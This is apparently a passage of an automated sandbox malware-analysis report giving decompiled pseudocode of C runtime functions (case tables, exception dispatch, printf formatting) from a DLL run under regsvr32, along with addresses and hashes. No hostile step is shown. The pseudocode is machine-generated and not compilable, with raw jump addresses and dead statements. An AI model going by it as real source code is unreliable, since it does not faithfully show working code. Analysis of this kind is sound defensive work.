                                                                    				_v56 = _v56 + 1;
                                                                    				__rdx = _a8;
                                                                    				 *((char*)(_a8 + __rcx + 0x1c)) = __al;
                                                                    				_v56 = _v56 + 0x20;
                                                                    				__ecx = _v56;
                                                                    				__rdx = _a8;
                                                                    				 *((char*)(_a8 + __rcx + 0x11d)) = __al;
                                                                    				goto 0xf9d2aa1b;
                                                                    				if (_v56 - 0x61 < 0) goto 0xf9d2aa04;
                                                                    				if (_v56 - 0x7a > 0) goto 0xf9d2aa04;
                                                                    				_v56 = _v56 + 1;
                                                                    				__rcx = _a8;
                                                                    				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000020;
                                                                    				_v56 = _v56 + 1;
                                                                    				__rdx = _a8;
                                                                    				 *((char*)(_a8 + __rcx + 0x1c)) = __al;
                                                                    				_v56 = _v56 - 0x20;
                                                                    				__ecx = _v56;
                                                                    				__rdx = _a8;
                                                                    				 *((char*)(__rdx + __rcx + 0x11d)) = __al;
                                                                    				goto 0xf9d2aa1b;
                                                                    				__eax = _v56;
                                                                    				__rcx = _a8;
                                                                    				 *((char*)(_a8 + __rax + 0x11d)) = 0;
                                                                    				goto L2;
                                                                    				__rcx = _v24;
                                                                    				__rcx = _v24 ^ __rsp;
                                                                    				return E000007FE7FEF9D23280(_v56, _v56, __edx, _v24 ^ __rsp, __rdx, __r8);
                                                                    			}























                                                                    0x7fef9d2a5e0
                                                                    0x7fef9d2a5e0
                                                                    0x7fef9d2a5ec
                                                                    0x7fef9d2a5f6
                                                                    0x7fef9d2a619
                                                                    0x7fef9d2a61f
                                                                    0x7fef9d2a62a
                                                                    0x7fef9d2a635
                                                                    0x7fef9d2a647
                                                                    0x7fef9d2a658
                                                                    0x7fef9d2a65f
                                                                    0x7fef9d2a661
                                                                    0x7fef9d2a671
                                                                    0x7fef9d2a679
                                                                    0x7fef9d2a687
                                                                    0x7fef9d2a69c
                                                                    0x7fef9d2a6a9
                                                                    0x7fef9d2a6b0
                                                                    0x7fef9d2a6bb
                                                                    0x7fef9d2a6c2
                                                                    0x7fef9d2a6d5
                                                                    0x7fef9d2a6de
                                                                    0x7fef9d2a6e6
                                                                    0x7fef9d2a6e8
                                                                    0x7fef9d2a6ea
                                                                    0x7fef9d2a6fd
                                                                    0x7fef9d2a70c
                                                                    0x7fef9d2a715
                                                                    0x7fef9d2a71a
                                                                    0x7fef9d2a72f
                                                                    0x7fef9d2a734
                                                                    0x7fef9d2a747
                                                                    0x7fef9d2a74b
                                                                    0x7fef9d2a75b
                                                                    0x7fef9d2a760
                                                                    0x7fef9d2a770
                                                                    0x7fef9d2a783
                                                                    0x7fef9d2a788
                                                                    0x7fef9d2a79b
                                                                    0x7fef9d2a79f
                                                                    0x7fef9d2a7af
                                                                    0x7fef9d2a7b4
                                                                    0x7fef9d2a7c4
                                                                    0x7fef9d2a7ca
                                                                    0x7fef9d2a7d7
                                                                    0x7fef9d2a7dc
                                                                    0x7fef9d2a7f2
                                                                    0x7fef9d2a804
                                                                    0x7fef9d2a81b
                                                                    0x7fef9d2a828
                                                                    0x7fef9d2a84b
                                                                    0x7fef9d2a86d
                                                                    0x7fef9d2a874
                                                                    0x7fef9d2a88a
                                                                    0x7fef9d2a897
                                                                    0x7fef9d2a8ba
                                                                    0x7fef9d2a8dc
                                                                    0x7fef9d2a8e3
                                                                    0x7fef9d2a8f4
                                                                    0x7fef9d2a8fc
                                                                    0x7fef9d2a901
                                                                    0x7fef9d2a906
                                                                    0x7fef9d2a91a
                                                                    0x7fef9d2a91c
                                                                    0x7fef9d2a92e
                                                                    0x7fef9d2a93c
                                                                    0x7fef9d2a946
                                                                    0x7fef9d2a94f
                                                                    0x7fef9d2a953
                                                                    0x7fef9d2a960
                                                                    0x7fef9d2a96a
                                                                    0x7fef9d2a96e
                                                                    0x7fef9d2a976
                                                                    0x7fef9d2a981
                                                                    0x7fef9d2a984
                                                                    0x7fef9d2a98b
                                                                    0x7fef9d2a993
                                                                    0x7fef9d2a99a
                                                                    0x7fef9d2a9a4
                                                                    0x7fef9d2a9ae
                                                                    0x7fef9d2a9b7
                                                                    0x7fef9d2a9bb
                                                                    0x7fef9d2a9c8
                                                                    0x7fef9d2a9d2
                                                                    0x7fef9d2a9d6
                                                                    0x7fef9d2a9de
                                                                    0x7fef9d2a9e9
                                                                    0x7fef9d2a9ec
                                                                    0x7fef9d2a9f3
                                                                    0x7fef9d2a9fb
                                                                    0x7fef9d2aa02
                                                                    0x7fef9d2aa04
                                                                    0x7fef9d2aa0b
                                                                    0x7fef9d2aa13
                                                                    0x7fef9d2aa1b
                                                                    0x7fef9d2aa20
                                                                    0x7fef9d2aa28
                                                                    0x7fef9d2aa37

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Info
                                                                    • String ID: $z
                                                                    • API String ID: 1807457897-2251613814
                                                                    • Opcode ID: 939841bcdfd8ad812f8c29de7d09562b703ae5a82c5ff0fab969d8d2fb6d5a5e
                                                                    • Instruction ID: 4853ceba84ddbb230417778543f3b3b02ea2aa858227094ccd1c634e11d49f23
                                                                    • Opcode Fuzzy Hash: 939841bcdfd8ad812f8c29de7d09562b703ae5a82c5ff0fab969d8d2fb6d5a5e
                                                                    • Instruction Fuzzy Hash: C8B1B77261CAC0CAD7B58B29E8807AFB7E0F388785F155125DAC983B99DB2DD4429F00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 35%
                                                                    			E000007FE7FEF9D34960(void* __ecx, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, long long _a16, long long _a24, long long _a32, signed int _a40, intOrPtr _a48, long long _a56, long long _a64) {
                                                                    				long long _v24;
                                                                    				long long _v32;
                                                                    				long long _v40;
                                                                    				long long _v48;
                                                                    				long long _v56;
                                                                    				char _v60;
                                                                    				char _v64;
                                                                    				signed int _v72;
                                                                    				char _v80;
                                                                    				char _v88;
                                                                    				long long _v96;
                                                                    				intOrPtr _v104;
                                                                    				long long _v112;
                                                                    				long long _v120;
                                                                    				long long _v128;
                                                                    				signed int _v136;
                                                                    				void* _t106;
                                                                    				void* _t117;
                                                                    				void* _t118;
                                                                    				void* _t119;
                                                                    				void* _t120;
                                                                    				void* _t121;
                                                                    				long long _t153;
                                                                    				signed int _t161;
                                                                    				signed int _t165;
                                                                    				long long _t166;
                                                                    				long long _t169;
                                                                    				long long _t170;
                                                                    				intOrPtr _t174;
                                                                    
                                                                    				_a32 = __r9;
                                                                    				_a24 = __r8;
                                                                    				_a16 = __rdx;
                                                                    				_a8 = __rcx;
                                                                    				_t153 = _a8;
                                                                    				if ( *_t153 != 0x80000003) goto 0xf9d34990;
                                                                    				goto 0xf9d34cc6;
                                                                    				0xf9d24000();
                                                                    				if ( *((long long*)(_t153 + 0xe0)) == 0) goto 0xf9d34a33;
                                                                    				0xf9d24000();
                                                                    				_v56 = _t153;
                                                                    				E000007FE7FEF9D23D00(_t106);
                                                                    				if ( *((intOrPtr*)(_v56 + 0xe0)) == _t153) goto 0xf9d34a33;
                                                                    				if ( *_a8 == 0xe0434f4d) goto 0xf9d34a33;
                                                                    				if ( *_a8 == 0xe0434352) goto 0xf9d34a33;
                                                                    				_v120 = _a64;
                                                                    				_v128 = _a56;
                                                                    				_v136 = _a40;
                                                                    				if (E000007FE7FEF9D2E9B0(_a8, _a16, _a24, _a32) == 0) goto 0xf9d34a33;
                                                                    				goto 0xf9d34cc6;
                                                                    				if ( *((intOrPtr*)(_a40 + 0xc)) == 0) goto 0xf9d34a43;
                                                                    				goto 0xf9d34a48;
                                                                    				E000007FE7FEF9D2CF80(_a40);
                                                                    				_v120 = _a32;
                                                                    				_v128 =  &_v60;
                                                                    				_t161 =  &_v64;
                                                                    				_v136 = _t161;
                                                                    				r9d = _a48;
                                                                    				r8d = _a56;
                                                                    				E000007FE7FEF9D2EA30(_a16, _a40);
                                                                    				_v72 = _t161;
                                                                    				_v64 = _v64 + 1;
                                                                    				_v72 = _v72 + 0x14;
                                                                    				if (_v64 - _v60 >= 0) goto 0xf9d34cc6;
                                                                    				if (_a48 -  *_v72 < 0) goto 0xf9d34c2b;
                                                                    				_t165 = _v72;
                                                                    				if (_a48 -  *((intOrPtr*)(_t165 + 4)) > 0) goto 0xf9d34c2b;
                                                                    				_t117 = E000007FE7FEF9D2E680( *((intOrPtr*)(_t165 + 4)), _t165);
                                                                    				_t166 = _t165 +  *((intOrPtr*)(_v72 + 0x10));
                                                                    				if ( *((intOrPtr*)(_t166 + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14)) == 0) goto 0xf9d34b53;
                                                                    				_t118 = E000007FE7FEF9D2E680(_t117, _t166);
                                                                    				_v48 = _t166;
                                                                    				_t119 = E000007FE7FEF9D2E680(_t118, _t166);
                                                                    				_t169 = _v48 +  *((intOrPtr*)(_t166 +  *((intOrPtr*)(_v72 + 0x10)) + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14));
                                                                    				_v40 = _t169;
                                                                    				goto 0xf9d34b5f;
                                                                    				_v40 = 0;
                                                                    				if (_v40 == 0) goto 0xf9d34bff;
                                                                    				_t120 = E000007FE7FEF9D2E680(_t119, _t169);
                                                                    				_t170 = _t169 +  *((intOrPtr*)(_v72 + 0x10));
                                                                    				if ( *((intOrPtr*)(_t170 + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14)) == 0) goto 0xf9d34be3;
                                                                    				_t121 = E000007FE7FEF9D2E680(_t120, _t170);
                                                                    				_v32 = _t170;
                                                                    				E000007FE7FEF9D2E680(_t121, _t170);
                                                                    				_v24 = _v32 +  *((intOrPtr*)(_t170 +  *((intOrPtr*)(_v72 + 0x10)) + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14));
                                                                    				goto 0xf9d34bef;
                                                                    				_v24 = 0;
                                                                    				_t174 = _v24;
                                                                    				if ( *((char*)(_t174 + 0x10)) != 0) goto 0xf9d34c2b;
                                                                    				E000007FE7FEF9D2E680( *((char*)(_t174 + 0x10)), _t174);
                                                                    				if (( *(_t174 +  *((intOrPtr*)(_v72 + 0x10)) + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14) & 0x00000040) == 0) goto 0xf9d34c30;
                                                                    				goto L1;
                                                                    				__eax = E000007FE7FEF9D2E680(__eax, __rax);
                                                                    				_v72 =  *((intOrPtr*)(_v72 + 0x10));
                                                                    				__rax = __rax +  *((intOrPtr*)(_v72 + 0x10));
                                                                    				_v72 =  *((intOrPtr*)(_v72 + 0xc)) - 1;
                                                                    				__rcx = ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14;
                                                                    				__rax = __rax + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14;
                                                                    				__eflags = __rax;
                                                                    				_v80 = 0;
                                                                    				_v88 = 1;
                                                                    				__rcx = _a64;
                                                                    				_v96 = _a64;
                                                                    				_v104 = _a56;
                                                                    				__rcx = _v72;
                                                                    				_v112 = _v72;
                                                                    				_v120 = 0;
                                                                    				_v128 = __rax;
                                                                    				__rax = _a40;
                                                                    				_v136 = _a40;
                                                                    				__r9 = _a32;
                                                                    				__r8 = _a24;
                                                                    				__rdx = _a16;
                                                                    				__rcx = _a8;
                                                                    				__eax = E000007FE7FEF9D35180(__edi, __esi, __esp, __eflags, _a8, _a16, _a24, _a32);
                                                                    				goto L1;
                                                                    				return __eax;
                                                                    			}
































                                                                    0x7fef9d34960
                                                                    0x7fef9d34965
                                                                    0x7fef9d3496a
                                                                    0x7fef9d3496f
                                                                    0x7fef9d3497b
                                                                    0x7fef9d34989
                                                                    0x7fef9d3498b
                                                                    0x7fef9d34990
                                                                    0x7fef9d3499d
                                                                    0x7fef9d349a3
                                                                    0x7fef9d349a8
                                                                    0x7fef9d349ad
                                                                    0x7fef9d349be
                                                                    0x7fef9d349ce
                                                                    0x7fef9d349de
                                                                    0x7fef9d349e8
                                                                    0x7fef9d349f4
                                                                    0x7fef9d34a00
                                                                    0x7fef9d34a2c
                                                                    0x7fef9d34a2e
                                                                    0x7fef9d34a3f
                                                                    0x7fef9d34a41
                                                                    0x7fef9d34a43
                                                                    0x7fef9d34a50
                                                                    0x7fef9d34a5a
                                                                    0x7fef9d34a5f
                                                                    0x7fef9d34a64
                                                                    0x7fef9d34a69
                                                                    0x7fef9d34a71
                                                                    0x7fef9d34a89
                                                                    0x7fef9d34a8e
                                                                    0x7fef9d34a9b
                                                                    0x7fef9d34aa8
                                                                    0x7fef9d34ab5
                                                                    0x7fef9d34ac9
                                                                    0x7fef9d34acf
                                                                    0x7fef9d34ade
                                                                    0x7fef9d34ae4
                                                                    0x7fef9d34af2
                                                                    0x7fef9d34b0b
                                                                    0x7fef9d34b0d
                                                                    0x7fef9d34b12
                                                                    0x7fef9d34b17
                                                                    0x7fef9d34b46
                                                                    0x7fef9d34b49
                                                                    0x7fef9d34b51
                                                                    0x7fef9d34b53
                                                                    0x7fef9d34b68
                                                                    0x7fef9d34b6e
                                                                    0x7fef9d34b7c
                                                                    0x7fef9d34b95
                                                                    0x7fef9d34b97
                                                                    0x7fef9d34b9c
                                                                    0x7fef9d34ba4
                                                                    0x7fef9d34bd9
                                                                    0x7fef9d34be1
                                                                    0x7fef9d34be3
                                                                    0x7fef9d34bef
                                                                    0x7fef9d34bfd
                                                                    0x7fef9d34bff
                                                                    0x7fef9d34c29
                                                                    0x7fef9d34c2b
                                                                    0x7fef9d34c30
                                                                    0x7fef9d34c3a
                                                                    0x7fef9d34c3e
                                                                    0x7fef9d34c4b
                                                                    0x7fef9d34c4e
                                                                    0x7fef9d34c52
                                                                    0x7fef9d34c52
                                                                    0x7fef9d34c55
                                                                    0x7fef9d34c5a
                                                                    0x7fef9d34c5f
                                                                    0x7fef9d34c67
                                                                    0x7fef9d34c73
                                                                    0x7fef9d34c77
                                                                    0x7fef9d34c7c
                                                                    0x7fef9d34c81
                                                                    0x7fef9d34c8a
                                                                    0x7fef9d34c8f
                                                                    0x7fef9d34c97
                                                                    0x7fef9d34c9c
                                                                    0x7fef9d34ca4
                                                                    0x7fef9d34cac
                                                                    0x7fef9d34cb4
                                                                    0x7fef9d34cbc
                                                                    0x7fef9d34cc1
                                                                    0x7fef9d34ccd

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 0-2084237596
                                                                    • Opcode ID: ff3899ab70367f580fbe79aa5854b52896b6d0a2cba9891fdbb3d09f9aae126f
                                                                    • Instruction ID: 969568d65f9d334bdbb71439fdfa9ac9293f65c07e2bfce327525da45f7ede8f
                                                                    • Opcode Fuzzy Hash: ff3899ab70367f580fbe79aa5854b52896b6d0a2cba9891fdbb3d09f9aae126f
                                                                    • Instruction Fuzzy Hash: FA91193260DB8582DAA4DB55E49077EB3A0F7C4785F214526EACE83BA9CF3DE041CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 19%
                                                                    			E000007FE7FEF9D3C6F8(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
                                                                    				signed int _t217;
                                                                    				signed char _t222;
                                                                    				intOrPtr _t257;
                                                                    				signed int _t332;
                                                                    				signed int _t333;
                                                                    				signed long long _t336;
                                                                    				intOrPtr* _t359;
                                                                    				signed long long _t384;
                                                                    
                                                                    				_t332 = __rax;
                                                                    				_a116 = 0x10;
                                                                    				asm("bts eax, 0xf");
                                                                    				_a708 = 7;
                                                                    				_a708 = 0x27;
                                                                    				_a72 = 0x10;
                                                                    				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
                                                                    				_a84 = 0x30;
                                                                    				_a85 = _a708 + 0x51;
                                                                    				_a92 = 2;
                                                                    				_a72 = 8;
                                                                    				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
                                                                    				asm("bts eax, 0x9");
                                                                    				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
                                                                    				E000007FE7FEF9D31EA0( &_a1112);
                                                                    				_a824 = _t332;
                                                                    				goto 0xf9d3c84b;
                                                                    				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
                                                                    				E000007FE7FEF9D31EA0( &_a1112);
                                                                    				_a824 = _t332;
                                                                    				goto 0xf9d3c84b;
                                                                    				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
                                                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
                                                                    				_t333 = E000007FE7FEF9D31E40( &_a1112);
                                                                    				_a824 = _t333;
                                                                    				goto 0xf9d3c80e;
                                                                    				E000007FE7FEF9D31E40( &_a1112);
                                                                    				_a824 = _t333;
                                                                    				goto 0xf9d3c84b;
                                                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
                                                                    				E000007FE7FEF9D31E40( &_a1112);
                                                                    				_a824 = _t333;
                                                                    				goto 0xf9d3c84b;
                                                                    				E000007FE7FEF9D31E40( &_a1112);
                                                                    				_a824 = _t333;
                                                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
                                                                    				if (_a824 >= 0) goto 0xf9d3c882;
                                                                    				_a832 =  ~_a824;
                                                                    				asm("bts eax, 0x8");
                                                                    				goto 0xf9d3c892;
                                                                    				_t336 = _a824;
                                                                    				_a832 = _t336;
                                                                    				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
                                                                    				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
                                                                    				_a832 = _a832 & _t336;
                                                                    				if (_a116 >= 0) goto 0xf9d3c8d8;
                                                                    				_a116 = 1;
                                                                    				goto 0xf9d3c8f5;
                                                                    				_a80 = _a80 & 0xfffffff7;
                                                                    				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
                                                                    				_a116 = 0x200;
                                                                    				if (_a832 != 0) goto 0xf9d3c908;
                                                                    				_a92 = 0;
                                                                    				_a64 =  &_a687;
                                                                    				_t217 = _a116;
                                                                    				_a116 = _a116 - 1;
                                                                    				if (_t217 > 0) goto 0xf9d3c936;
                                                                    				if (_a832 == 0) goto 0xf9d3c9d3;
                                                                    				_a1040 = _a72;
                                                                    				_a816 = _t217 / _a1040 + 0x30;
                                                                    				_a1048 = _a72;
                                                                    				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
                                                                    				_t222 = _a816 + _a708;
                                                                    				_a816 = _t222;
                                                                    				 *_a64 = _a816 & 0x000000ff;
                                                                    				_a64 = _a64 - 1;
                                                                    				goto 0xf9d3c915;
                                                                    				_a104 = _t222;
                                                                    				_a64 = _a64 + 1;
                                                                    				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
                                                                    				if (_a104 == 0) goto 0xf9d3ca12;
                                                                    				if ( *_a64 == 0x30) goto 0xf9d3ca31;
                                                                    				_a64 = _a64 - 1;
                                                                    				 *_a64 = 0x30;
                                                                    				_a104 = _a104 + 1;
                                                                    				if (_a108 != 0) goto 0xf9d3cc6e;
                                                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
                                                                    				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
                                                                    				_a84 = 0x2d;
                                                                    				_a92 = 1;
                                                                    				goto 0xf9d3ca95;
                                                                    				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
                                                                    				_a84 = 0x2b;
                                                                    				_a92 = 1;
                                                                    				goto 0xf9d3ca95;
                                                                    				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
                                                                    				_a84 = 0x20;
                                                                    				_a92 = 1;
                                                                    				_a840 = _a88 - _a104 - _a92;
                                                                    				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
                                                                    				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                                                    				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
                                                                    				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
                                                                    				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
                                                                    				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
                                                                    				if (_a76 == 0) goto 0xf9d3cc1d;
                                                                    				if (_a104 <= 0) goto 0xf9d3cc1d;
                                                                    				_a872 = 0;
                                                                    				_a848 = _a64;
                                                                    				_a856 = _a104;
                                                                    				_a856 = _a856 - 1;
                                                                    				if (_a856 == 0) goto 0xf9d3cc1b;
                                                                    				_a1056 =  *_a848 & 0x0000ffff;
                                                                    				r9d = _a1056 & 0x0000ffff;
                                                                    				r8d = 6;
                                                                    				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
                                                                    				_a848 =  &(_a848[1]);
                                                                    				if (_a872 != 0) goto 0xf9d3cbe5;
                                                                    				if (_a860 != 0) goto 0xf9d3cbf2;
                                                                    				_a688 = 0xffffffff;
                                                                    				goto 0xf9d3cc1b;
                                                                    				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
                                                                    				goto 0xf9d3cb60;
                                                                    				goto 0xf9d3cc3b;
                                                                    				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
                                                                    				if (_a688 < 0) goto 0xf9d3cc6e;
                                                                    				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
                                                                    				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                                                    				if (_a96 == 0) goto 0xf9d3cc8e;
                                                                    				0xf9d25330();
                                                                    				_a96 = 0;
                                                                    				goto 0xf9d3b99c;
                                                                    				if (_a704 == 0) goto 0xf9d3ccb4;
                                                                    				if (_a704 == 7) goto 0xf9d3ccb4;
                                                                    				_a1060 = 0;
                                                                    				goto 0xf9d3ccbf;
                                                                    				_a1060 = 1;
                                                                    				_t257 = _a1060;
                                                                    				_a876 = _t257;
                                                                    				if (_a876 != 0) goto 0xf9d3cd05;
                                                                    				_t359 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                                    				_a32 = _t359;
                                                                    				r9d = 0;
                                                                    				r8d = 0x8f5;
                                                                    				0xf9d2b3b0();
                                                                    				if (_t257 != 1) goto 0xf9d3cd05;
                                                                    				asm("int3");
                                                                    				if (_a876 != 0) goto 0xf9d3cd61;
                                                                    				0xf9d2ab30();
                                                                    				 *_t359 = 0x16;
                                                                    				_a32 = 0;
                                                                    				r9d = 0x8f5;
                                                                    				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                    				_a912 = 0xffffffff;
                                                                    				E000007FE7FEF9D26800( &_a120);
                                                                    				goto 0xf9d3cd80;
                                                                    				_a916 = _a688;
                                                                    				E000007FE7FEF9D26800( &_a120);
                                                                    				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t384, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                    			}











                                                                    0x7fef9d3c6f8
                                                                    0x7fef9d3c6f8
                                                                    0x7fef9d3c704
                                                                    0x7fef9d3c70c
                                                                    0x7fef9d3c719
                                                                    0x7fef9d3c724
                                                                    0x7fef9d3c737
                                                                    0x7fef9d3c739
                                                                    0x7fef9d3c748
                                                                    0x7fef9d3c74c
                                                                    0x7fef9d3c756
                                                                    0x7fef9d3c769
                                                                    0x7fef9d3c76f
                                                                    0x7fef9d3c782
                                                                    0x7fef9d3c78c
                                                                    0x7fef9d3c791
                                                                    0x7fef9d3c799
                                                                    0x7fef9d3c7a9
                                                                    0x7fef9d3c7b3
                                                                    0x7fef9d3c7b8
                                                                    0x7fef9d3c7c0
                                                                    0x7fef9d3c7ce
                                                                    0x7fef9d3c7d9
                                                                    0x7fef9d3c7e8
                                                                    0x7fef9d3c7ec
                                                                    0x7fef9d3c7f4
                                                                    0x7fef9d3c7fe
                                                                    0x7fef9d3c806
                                                                    0x7fef9d3c80e
                                                                    0x7fef9d3c819
                                                                    0x7fef9d3c823
                                                                    0x7fef9d3c82a
                                                                    0x7fef9d3c832
                                                                    0x7fef9d3c83c
                                                                    0x7fef9d3c843
                                                                    0x7fef9d3c854
                                                                    0x7fef9d3c85f
                                                                    0x7fef9d3c86c
                                                                    0x7fef9d3c878
                                                                    0x7fef9d3c880
                                                                    0x7fef9d3c882
                                                                    0x7fef9d3c88a
                                                                    0x7fef9d3c89d
                                                                    0x7fef9d3c8aa
                                                                    0x7fef9d3c8bf
                                                                    0x7fef9d3c8cc
                                                                    0x7fef9d3c8ce
                                                                    0x7fef9d3c8d6
                                                                    0x7fef9d3c8df
                                                                    0x7fef9d3c8eb
                                                                    0x7fef9d3c8ed
                                                                    0x7fef9d3c8fe
                                                                    0x7fef9d3c900
                                                                    0x7fef9d3c910
                                                                    0x7fef9d3c915
                                                                    0x7fef9d3c91f
                                                                    0x7fef9d3c925
                                                                    0x7fef9d3c930
                                                                    0x7fef9d3c93b
                                                                    0x7fef9d3c95e
                                                                    0x7fef9d3c96a
                                                                    0x7fef9d3c997
                                                                    0x7fef9d3c9a9
                                                                    0x7fef9d3c9ab
                                                                    0x7fef9d3c9bf
                                                                    0x7fef9d3c9c9
                                                                    0x7fef9d3c9ce
                                                                    0x7fef9d3c9e0
                                                                    0x7fef9d3c9ec
                                                                    0x7fef9d3c9fc
                                                                    0x7fef9d3ca03
                                                                    0x7fef9d3ca10
                                                                    0x7fef9d3ca1a
                                                                    0x7fef9d3ca24
                                                                    0x7fef9d3ca2d
                                                                    0x7fef9d3ca36
                                                                    0x7fef9d3ca45
                                                                    0x7fef9d3ca52
                                                                    0x7fef9d3ca54
                                                                    0x7fef9d3ca59
                                                                    0x7fef9d3ca61
                                                                    0x7fef9d3ca6c
                                                                    0x7fef9d3ca6e
                                                                    0x7fef9d3ca73
                                                                    0x7fef9d3ca7b
                                                                    0x7fef9d3ca86
                                                                    0x7fef9d3ca88
                                                                    0x7fef9d3ca8d
                                                                    0x7fef9d3caa5
                                                                    0x7fef9d3cab5
                                                                    0x7fef9d3cad0
                                                                    0x7fef9d3caee
                                                                    0x7fef9d3cafc
                                                                    0x7fef9d3cb07
                                                                    0x7fef9d3cb22
                                                                    0x7fef9d3cb2c
                                                                    0x7fef9d3cb37
                                                                    0x7fef9d3cb3d
                                                                    0x7fef9d3cb4d
                                                                    0x7fef9d3cb59
                                                                    0x7fef9d3cb70
                                                                    0x7fef9d3cb79
                                                                    0x7fef9d3cb8a
                                                                    0x7fef9d3cb92
                                                                    0x7fef9d3cb9b
                                                                    0x7fef9d3cbb6
                                                                    0x7fef9d3cbc9
                                                                    0x7fef9d3cbd9
                                                                    0x7fef9d3cbe3
                                                                    0x7fef9d3cbe5
                                                                    0x7fef9d3cbf0
                                                                    0x7fef9d3cc11
                                                                    0x7fef9d3cc16
                                                                    0x7fef9d3cc1b
                                                                    0x7fef9d3cc36
                                                                    0x7fef9d3cc43
                                                                    0x7fef9d3cc4e
                                                                    0x7fef9d3cc69
                                                                    0x7fef9d3cc74
                                                                    0x7fef9d3cc80
                                                                    0x7fef9d3cc85
                                                                    0x7fef9d3cc8e
                                                                    0x7fef9d3cc9b
                                                                    0x7fef9d3cca5
                                                                    0x7fef9d3cca7
                                                                    0x7fef9d3ccb2
                                                                    0x7fef9d3ccb4
                                                                    0x7fef9d3ccbf
                                                                    0x7fef9d3ccc6
                                                                    0x7fef9d3ccd5
                                                                    0x7fef9d3ccd7
                                                                    0x7fef9d3ccde
                                                                    0x7fef9d3cce3
                                                                    0x7fef9d3cce6
                                                                    0x7fef9d3ccf8
